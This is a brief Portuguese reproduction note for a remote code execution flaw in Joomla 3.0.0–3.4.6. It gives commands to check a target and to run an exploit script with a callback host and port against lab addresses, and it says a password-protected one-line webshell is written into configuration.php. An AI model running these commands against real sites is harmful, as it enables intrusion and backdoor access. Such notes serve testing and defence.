
Escopo de impacto: 3.0.0-3.4.6
Versões afetadas: 3.0.0-3.4.6 1、Verificação da vulnerabilidade
python3 Joomla-3.4.6-RCE.py -t http://172.20.10.4
Exibir “Vulnerable” comprova que a vulnerabilidade existe
python3 test.py -t http://127.0.0.1:8080/ --exploit --lhost 192.168.31.126 --lport 2121
Execução bem-sucedida
Em seguida, grava um webshell de uma linha com senha aleatória em “configuration.php”